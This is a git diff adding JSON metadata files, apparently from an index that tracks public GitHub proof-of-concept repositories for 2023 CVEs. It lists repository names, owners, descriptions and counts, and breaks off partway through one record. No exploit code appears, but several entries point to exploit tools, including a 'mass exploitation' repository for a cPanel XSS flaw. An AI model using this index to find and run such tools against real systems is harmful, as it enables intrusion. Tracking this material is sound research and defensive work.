new file mode 100644
index 0000000000..d0e0b825e5
--- /dev/null
+++ b/2023/CVE-2023-29360.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 696013086,
+ "name": "cve-2023-29360",
+ "full_name": "Nero22k\/cve-2023-29360",
+ "owner": {
+ "login": "Nero22k",
+ "id": 64486541,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64486541?v=4",
+ "html_url": "https:\/\/github.com\/Nero22k"
+ },
+ "html_url": "https:\/\/github.com\/Nero22k\/cve-2023-29360",
+ "description": "Exploit for CVE-2023-29360 targeting MSKSSRV.SYS driver",
+ "fork": false,
+ "created_at": "2023-09-24T21:59:23Z",
+ "updated_at": "2024-06-21T00:11:33Z",
+ "pushed_at": "2023-10-12T19:18:32Z",
+ "stargazers_count": 129,
+ "watchers_count": 129,
+ "has_discussions": false,
+ "forks_count": 33,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 33,
+ "watchers": 129,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-29406.json b/2023/CVE-2023-29406.json
new file mode 100644
index 0000000000..d486f403d9
--- /dev/null
+++ b/2023/CVE-2023-29406.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 717490918,
+ "name": "EP3_Redes",
+ "full_name": "LuizGustavoP\/EP3_Redes",
+ "owner": {
+ "login": "LuizGustavoP",
+ "id": 62386766,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62386766?v=4",
+ "html_url": "https:\/\/github.com\/LuizGustavoP"
+ },
+ "html_url": "https:\/\/github.com\/LuizGustavoP\/EP3_Redes",
+ "description": "Implementações de servidores HTML em GO para análise da vulnerabilidade CVE-2023-29406.",
+ "fork": false,
+ "created_at": "2023-11-11T16:28:22Z",
+ "updated_at": "2023-11-11T16:28:22Z",
+ "pushed_at": "2023-11-11T16:28:22Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-29409.json b/2023/CVE-2023-29409.json
new file mode 100644
index 0000000000..463e5e9d6b
--- /dev/null
+++ b/2023/CVE-2023-29409.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 681256401,
+ "name": "CVE-2023-29409",
+ "full_name": "mateusz834\/CVE-2023-29409",
+ "owner": {
+ "login": "mateusz834",
+ "id": 19653795,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19653795?v=4",
+ "html_url": "https:\/\/github.com\/mateusz834"
+ },
+ "html_url": "https:\/\/github.com\/mateusz834\/CVE-2023-29409",
+ "description": " CVE-2023-29409 reproducer",
+ "fork": false,
+ "created_at": "2023-08-21T15:59:26Z",
+ "updated_at": "2023-09-28T11:46:49Z",
+ "pushed_at": "2023-08-21T16:03:02Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-29439.json b/2023/CVE-2023-29439.json
new file mode 100644
index 0000000000..9e45e25d82
--- /dev/null
+++ b/2023/CVE-2023-29439.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 662588518,
+ "name": "CVE-2023-29439",
+ "full_name": "LOURC0D3\/CVE-2023-29439",
+ "owner": {
+ "login": "LOURC0D3",
+ "id": 83567597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83567597?v=4",
+ "html_url": "https:\/\/github.com\/LOURC0D3"
+ },
+ "html_url": "https:\/\/github.com\/LOURC0D3\/CVE-2023-29439",
+ "description": "PoC of CVE-2023-29439",
+ "fork": false,
+ "created_at": "2023-07-05T13:04:39Z",
+ "updated_at": "2023-08-06T14:54:28Z",
+ "pushed_at": "2023-07-05T13:06:37Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-29489.json b/2023/CVE-2023-29489.json
new file mode 100644
index 0000000000..2060427b27
--- /dev/null
+++ b/2023/CVE-2023-29489.json
@@ -0,0 +1,293 @@
+[
+ {
+ "id": 674826920,
+ "name": "cpanel-xss-177",
+ "full_name": "ViperM4sk\/cpanel-xss-177",
+ "owner": {
+ "login": "ViperM4sk",
+ "id": 141459387,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/141459387?v=4",
+ "html_url": "https:\/\/github.com\/ViperM4sk"
+ },
+ "html_url": "https:\/\/github.com\/ViperM4sk\/cpanel-xss-177",
+ "description": "Mass Exploitation For (CVE-2023-29489)",
+ "fork": false,
+ "created_at": "2023-08-04T22:21:57Z",
+ "updated_at": "2023-08-04T23:05:52Z",
+ "pushed_at": "2023-08-05T01:31:01Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 706134149,
+ "name": "CVE-2023-29489",
+ "full_name": "S4muraiMelayu1337\/CVE-2023-29489",
+ "owner": {
+ "login": "S4muraiMelayu1337",
+ "id": 130330296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130330296?v=4",
+ "html_url": "https:\/\/github.com\/S4muraiMelayu1337"
+ },
+ "html_url": "https:\/\/github.com\/S4muraiMelayu1337\/CVE-2023-29489",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-17T11:18:53Z",
+ "updated_at": "2023-10-17T11:21:12Z",
+ "pushed_at": "2023-10-17T11:23:34Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 719748102,
+ "name": "CVE-2023-29489",
+ "full_name": "SynixCyberCrimeMy\/CVE-2023-29489",
+ "owner": {
+ "login": "SynixCyberCrimeMy",
+ "id": 151055664,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151055664?v=4",
+ "html_url": "https:\/\/github.com\/SynixCyberCrimeMy"
+ },
+ "html_url": "https:\/\/github.com\/SynixCyberCrimeMy\/CVE-2023-29489",
+ "description": "SynixCyberCrimeMY CVE-2023-29489 Scanner By SamuraiMelayu1337 & h4zzzzzz@scc",
+ "fork": false,
+ "created_at": "2023-11-16T20:24:11Z",
+ "updated_at": "2023-11-16T20:25:12Z",
+ "pushed_at": "2023-11-16T20:30:25Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 734955941,
+ "name": "Validate-CVE-2023-29489-scanner-",
+ "full_name": "Makurorororororororo\/Validate-CVE-2023-29489-scanner-",
+ "owner": {
+ "login": "Makurorororororororo",
+ "id": 110962804,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110962804?v=4",
+ "html_url": "https:\/\/github.com\/Makurorororororororo"
+ },
+ "html_url": "https:\/\/github.com\/Makurorororororororo\/Validate-CVE-2023-29489-scanner-",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-12-23T06:28:32Z",
+ "updated_at": "2024-06-07T07:44:55Z",
+ "pushed_at": "2023-12-23T06:35:24Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 746343792,
+ "name": "tool-29489",
+ "full_name": "prasad-1808\/tool-29489",
+ "owner": {
+ "login": "prasad-1808",
+ "id": 86564180,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86564180?v=4",
+ "html_url": "https:\/\/github.com\/prasad-1808"
+ },
+ "html_url": "https:\/\/github.com\/prasad-1808\/tool-29489",
+ "description": "This Tool is used to check for CVE-2023-29489 Vulnerability in the provided URL with the set of payloads available",
+ "fork": false,
+ "created_at": "2024-01-21T19:23:47Z",
+ "updated_at": "2024-01-21T19:38:23Z",
+ "pushed_at": "2024-01-21T20:10:30Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 747385819,
+ "name": "cpanel_xss_2023",
+ "full_name": "mdaseem03\/cpanel_xss_2023",
+ "owner": {
+ "login": "mdaseem03",
+ "id": 98540960,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98540960?v=4",
+ "html_url": "https:\/\/github.com\/mdaseem03"
+ },
+ "html_url": "https:\/\/github.com\/mdaseem03\/cpanel_xss_2023",
+ "description": "cpanel_xss_2023 is a simple Python script designed for finding CVE-2023-29489 vulnerability in cpanel.",
+ "fork": false,
+ "created_at": "2024-01-23T20:29:57Z",
+ "updated_at": "2024-06-03T08:19:43Z",
+ "pushed_at": "2024-01-31T16:23:15Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 786366131,
+ "name": "CVE-2023-29489",
+ "full_name": "some-man1\/CVE-2023-29489",
+ "owner": {
+ "login": "some-man1",
+ "id": 142589483,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142589483?v=4",
+ "html_url": "https:\/\/github.com\/some-man1"
+ },
+ "html_url": "https:\/\/github.com\/some-man1\/CVE-2023-29489",
+ "description": "# CVE-2023-29489 exploit",
+ "fork": false,
+ "created_at": "2024-04-14T08:29:22Z",
+ "updated_at": "2024-04-14T08:32:44Z",
+ "pushed_at": "2024-04-14T08:45:19Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cpanel",
+ "cve",
+ "cve-2023-29489",
+ "exploit",
+ "priv8",
+ "python",
+ "python3",
+ "vulnerabilities",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 789738179,
+ "name": "CVE-2023-29489",
+ "full_name": "Cappricio-Securities\/CVE-2023-29489",
+ "owner": {
+ "login": "Cappricio-Securities",
+ "id": 102907425,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4",
+ "html_url": "https:\/\/github.com\/Cappricio-Securities"
+ },
+ "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2023-29489",
+ "description": "An issue was discovered in cPanel before 11.109.9999.116. Cross-Site Scripting can occur on the cpsrvd error page via an invalid webcall ID.",
+ "fork": false,
+ "created_at": "2024-04-21T12:26:22Z",
+ "updated_at": "2024-06-21T07:23:23Z",
+ "pushed_at": "2024-06-21T07:23:19Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cpanel",
+ "cve",
+ "cve-2023-29489",
+ "reflected-xss",
+ "xss",
+ "xss-vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 807997088,
+ "name": "CVE-2023-29489",
+ "full_name": "md-thalal\/CVE-2023-29489",
+ "owner": {
+ "login": "md-thalal",
+ "id": 171010055,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/171010055?v=4",
+ "html_url": "https:\/\/github.com\/md-thalal"
+ },
+ "html_url": "https:\/\/github.com\/md-thalal\/CVE-2023-29489",
+ "description": "CVE-2023-29489 is a vulnerability to exploitable in cross-site scripting ( xss ) reflect the cpanel ",
+ "fork": false,
+ "created_at": "2024-05-30T07:20:09Z",
+ "updated_at": "2024-06-12T05:58:43Z",
+ "pushed_at": "2024-06-12T05:58:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cpanel",
+ "cross-site-scripting",
+ "xss-vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-2982.json b/2023/CVE-2023-2982.json
new file mode 100644
index 0000000000..c9b1348aeb
--- /dev/null
+++ b/2023/CVE-2023-2982.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 663411527,
+ "name": "CVE-2023-2982",
+ "full_name": "LoaiEsam37\/CVE-2023-2982",
+ "owner": {
+ "login": "LoaiEsam37",
+ "id": 114489561,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114489561?v=4",
+ "html_url": "https:\/\/github.com\/LoaiEsam37"
+ },
+ "html_url": "https:\/\/github.com\/LoaiEsam37\/CVE-2023-2982",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-07-07T08:25:38Z",
+ "updated_at": "2023-07-08T06:57:21Z",
+ "pushed_at": "2023-07-07T09:33:00Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 720332712,
+ "name": "CVE-2023-2982",
+ "full_name": "wshinkle\/CVE-2023-2982",
+ "owner": {
+ "login": "wshinkle",
+ "id": 91923278,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91923278?v=4",
+ "html_url": "https:\/\/github.com\/wshinkle"
+ },
+ "html_url": "https:\/\/github.com\/wshinkle\/CVE-2023-2982",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-18T06:34:15Z",
+ "updated_at": "2023-11-18T06:44:45Z",
+ "pushed_at": "2023-11-18T06:44:41Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-29922.json b/2023/CVE-2023-29922.json
new file mode 100644
index 0000000000..cd05f60e1f
--- /dev/null
+++ b/2023/CVE-2023-29922.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 702908363,
+ "name": "Powerjob-CVE-2023-29922-",
+ "full_name": "CN016\/Powerjob-CVE-2023-29922-",
+ "owner": {
+ "login": "CN016",
+ "id": 108575004,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108575004?v=4",
+ "html_url": "https:\/\/github.com\/CN016"
+ },
+ "html_url": "https:\/\/github.com\/CN016\/Powerjob-CVE-2023-29922-",
+ "description": "Powerjob 未授权访问漏洞(CVE-2023-29922)",
+ "fork": false,
+ "created_at": "2023-10-10T08:35:00Z",
+ "updated_at": "2023-10-10T08:41:21Z",
+ "pushed_at": "2023-10-10T08:41:16Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-30033.json b/2023/CVE-2023-30033.json
new file mode 100644
index 0000000000..038e25d4b3
--- /dev/null
+++ b/2023/CVE-2023-30033.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 709099001,
+ "name": "CVE-2023-30033",
+ "full_name": "phucodeexp\/CVE-2023-30033",
+ "owner": {
+ "login": "phucodeexp",
+ "id": 148666067,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148666067?v=4",
+ "html_url": "https:\/\/github.com\/phucodeexp"
+ },
+ "html_url": "https:\/\/github.com\/phucodeexp\/CVE-2023-30033",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-24T02:23:03Z",
+ "updated_at": "2023-10-24T02:27:13Z",
+ "pushed_at": "2023-10-24T02:27:09Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-30190.json b/2023/CVE-2023-30190.json
new file mode 100644
index 0000000000..6da5cd04a5
--- /dev/null
+++ b/2023/CVE-2023-30190.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 714643620,
+ "name": "CVE-2023-30190-FOLLINA",
+ "full_name": "MojithaR\/CVE-2023-30190-FOLLINA",
+ "owner": {
+ "login": "MojithaR",
+ "id": 127576267,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127576267?v=4",
+ "html_url": "https:\/\/github.com\/MojithaR"
+ },
+ "html_url": "https:\/\/github.com\/MojithaR\/CVE-2023-30190-FOLLINA",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-05T13:36:07Z",
+ "updated_at": "2024-06-23T14:56:11Z",
+ "pushed_at": "2023-11-19T12:49:58Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-30226.json b/2023/CVE-2023-30226.json
new file mode 100644
index 0000000000..5e6fb372b7
--- /dev/null
+++ b/2023/CVE-2023-30226.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 664045595,
+ "name": "CVE-2023-30226",
+ "full_name": "ifyGecko\/CVE-2023-30226",
+ "owner": {
+ "login": "ifyGecko",
+ "id": 26214995,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26214995?v=4",
+ "html_url": "https:\/\/github.com\/ifyGecko"
+ },
+ "html_url": "https:\/\/github.com\/ifyGecko\/CVE-2023-30226",
+ "description": "rizin denial of service bug",
+ "fork": false,
+ "created_at": "2023-07-08T19:14:30Z",
+ "updated_at": "2023-07-08T20:21:55Z",
+ "pushed_at": "2023-07-08T20:20:56Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-30253.json b/2023/CVE-2023-30253.json
new file mode 100644
index 0000000000..ce51844a72
--- /dev/null
+++ b/2023/CVE-2023-30253.json
@@ -0,0 +1,156 @@
+[
+ {
+ "id": 806179763,
+ "name": "cve-2023-30253",
+ "full_name": "Rubikcuv5\/cve-2023-30253",
+ "owner": {
+ "login": "Rubikcuv5",
+ "id": 47946047,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47946047?v=4",
+ "html_url": "https:\/\/github.com\/Rubikcuv5"
+ },
+ "html_url": "https:\/\/github.com\/Rubikcuv5\/cve-2023-30253",
+ "description": "Dolibarr before 17.0.1 allows remote code execution by an authenticated user via an uppercase manipulation: v1.0.139 allows directory traversal in the website component",
+ "fork": false,
+ "created_at": "2023-08-14T06:18:48Z",
+ "updated_at": "2024-05-17T12:29:22Z",
+ "pushed_at": "2024-05-15T15:21:38Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-40361.json b/2023/CVE-2023-40361.json
new file mode 100644
index 0000000000..0202c3887f
--- /dev/null
+++ b/2023/CVE-2023-40361.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 705558213,
+ "name": "CVE-2023-40361",
+ "full_name": "vianic\/CVE-2023-40361",
+ "owner": {
+ "login": "vianic",
+ "id": 61748137,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61748137?v=4",
+ "html_url": "https:\/\/github.com\/vianic"
+ },
+ "html_url": "https:\/\/github.com\/vianic\/CVE-2023-40361",
+ "description": "Security Vulnerability - SECUDOS Qiata",
+ "fork": false,
+ "created_at": "2023-10-16T08:49:25Z",
+ "updated_at": "2023-10-16T08:49:25Z",
+ "pushed_at": "2023-10-16T10:38:07Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-40362.json b/2023/CVE-2023-40362.json
new file mode 100644
index 0000000000..dff10fee8a
--- /dev/null
+++ b/2023/CVE-2023-40362.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 683251677,
+ "name": "CVE-2023-40362",
+ "full_name": "ally-petitt\/CVE-2023-40362",
+ "owner": {
+ "login": "ally-petitt",
+ "id": 76501220,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76501220?v=4",
+ "html_url": "https:\/\/github.com\/ally-petitt"
+ },
+ "html_url": "https:\/\/github.com\/ally-petitt\/CVE-2023-40362",
+ "description": "CVE-2023-40362 Vulnerabilitiy details and proof of concept",
+ "fork": false,
+ "created_at": "2023-08-26T01:35:43Z",
+ "updated_at": "2023-12-26T17:07:13Z",
+ "pushed_at": "2023-12-25T02:40:59Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-40429.json b/2023/CVE-2023-40429.json
new file mode 100644
index 0000000000..0226cfcb51
--- /dev/null
+++ b/2023/CVE-2023-40429.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 702720524,
+ "name": "cve-2023-40429-ez-device-name",
+ "full_name": "biscuitehh\/cve-2023-40429-ez-device-name",
+ "owner": {
+ "login": "biscuitehh",
+ "id": 507442,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/507442?v=4",
+ "html_url": "https:\/\/github.com\/biscuitehh"
+ },
+ "html_url": "https:\/\/github.com\/biscuitehh\/cve-2023-40429-ez-device-name",
+ "description": "CVE-2023-40429: An app may be able to access sensitive user data.",
+ "fork": false,
+ "created_at": "2023-10-09T21:52:56Z",
+ "updated_at": "2024-04-14T18:03:42Z",
+ "pushed_at": "2023-10-09T22:21:04Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-40459.json b/2023/CVE-2023-40459.json
new file mode 100644
index 0000000000..a22d5bb5f5
--- /dev/null
+++ b/2023/CVE-2023-40459.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 750832697,
+ "name": "CVE-2023-40459",
+ "full_name": "majidmc2\/CVE-2023-40459",
+ "owner": {
+ "login": "majidmc2",
+ "id": 33040588,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33040588?v=4",
+ "html_url": "https:\/\/github.com\/majidmc2"
+ },
+ "html_url": "https:\/\/github.com\/majidmc2\/CVE-2023-40459",
+ "description": "PoC of CVE-2023-40459 (DoS on ACEmanager)",
+ "fork": false,
+ "created_at": "2024-01-31T12:11:34Z",
+ "updated_at": "2024-02-08T15:59:49Z",
+ "pushed_at": "2024-02-03T07:33:20Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-40477.json b/2023/CVE-2023-40477.json
new file mode 100644
index 0000000000..e76431ca1b
--- /dev/null
+++ b/2023/CVE-2023-40477.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 684635082,
+ "name": "Scan_WinRAR",
+ "full_name": "winkler-winsen\/Scan_WinRAR",
+ "owner": {
+ "login": "winkler-winsen",
+ "id": 43114182,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43114182?v=4",
+ "html_url": "https:\/\/github.com\/winkler-winsen"
+ },
+ "html_url": "https:\/\/github.com\/winkler-winsen\/Scan_WinRAR",
+ "description": "Scan for WinRAR files affected to CVE-2023-40477",
+ "fork": false,
+ "created_at": "2023-08-29T14:41:58Z",
+ "updated_at": "2023-08-29T14:44:09Z",
+ "pushed_at": "2023-08-29T14:44:05Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 684680824,
+ "name": "Winrar-CVE-2023-40477-POC",
+ "full_name": "wildptr-io\/Winrar-CVE-2023-40477-POC",
+ "owner": {
+ "login": "wildptr-io",
+ "id": 130668432,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130668432?v=4",
+ "html_url": "https:\/\/github.com\/wildptr-io"
+ },
+ "html_url": "https:\/\/github.com\/wildptr-io\/Winrar-CVE-2023-40477-POC",
+ "description": "CVE-2023-40477 PoC by Wild-Pointer",
+ "fork": false,
+ "created_at": "2023-08-29T16:29:48Z",
+ "updated_at": "2024-06-13T21:12:19Z",
+ "pushed_at": "2023-08-30T14:34:32Z",
+ "stargazers_count": 26,
+ "watchers_count": 26,
+ "has_discussions": false,
+ "forks_count": 9,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 9,
+ "watchers": 26,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-40600.json b/2023/CVE-2023-40600.json
new file mode 100644
index 0000000000..8e56aa3a20
--- /dev/null
+++ b/2023/CVE-2023-40600.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 721296341,
+ "name": "CVE-2023-40600",
+ "full_name": "RandomRobbieBF\/CVE-2023-40600",
+ "owner": {
+ "login": "RandomRobbieBF",
+ "id": 51722811,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4",
+ "html_url": "https:\/\/github.com\/RandomRobbieBF"
+ },
+ "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-40600",
+ "description": "EWWW Image Optimizer <= 7.2.0 - Unauthenticated Sensitive Information Exposure via Debug Log",
+ "fork": false,
+ "created_at": "2023-11-20T19:05:50Z",
+ "updated_at": "2023-11-20T19:05:51Z",
